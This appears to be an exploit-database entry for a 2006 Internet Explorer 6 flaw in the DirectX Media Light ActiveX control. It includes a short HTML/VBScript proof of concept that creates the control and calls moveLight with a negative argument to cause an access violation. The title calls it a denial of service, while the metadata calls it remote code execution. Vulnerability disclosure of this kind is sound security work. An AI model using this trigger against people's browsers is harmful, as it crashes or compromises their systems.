MS Internet Explorer 6 DirectX Media DoS Vulnerability

vendor:

Internet Explorer

by:

r0ut3r (writ3r [at] gmail.com)

9.3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Internet Explorer

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2006

MS Internet Explorer 6 DirectX Media DoS Vulnerability

The DXImageTransform.Microsoft.Light ActiveX control is prone to remote code execution. An attacker could exploit this issue to execute code in the context of the user visiting a malicious web page. This is done by supplying negative parameters to the moveLight() function, which throws an access violation.

Mitigation:

Users should avoid visiting untrusted websites and should disable ActiveX controls in their web browsers.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/18303/info

The DXImageTransform.Microsoft.Light ActiveX control is prone to remote code execution. 

An attacker could exploit this issue to execute code in the context of the user visiting a malicious web page.

<!--
MS Internet Explorer 6 DirectX Media DoS Vulnerability
DLL: dxtmsft.dll

Discovered & Coded by: r0ut3r (writ3r [at] gmail.com)

Description: 
Sub moveLight (
 	ByVal lightNum  As Long , 
 	ByVal x  As Long , 
 	ByVal y  As Long , 
 	ByVal z  As Long , 
 	ByVal fAbsolute  As Long 
)
Supplying negative parameters throws an access violation. 
-->

<object classid="clsid:F9EFBEC2-4302-11D2-952A-00C04FA34F05" id="DXTLight">
	Unable to create object
</object>

<script language="vbscript">
	Sub go
		DXTLight.moveLight "-1", "1", "1", "1", "1"
	End Sub
</script>
<input language=VBScript type="button" value="Try me" onclick="go()">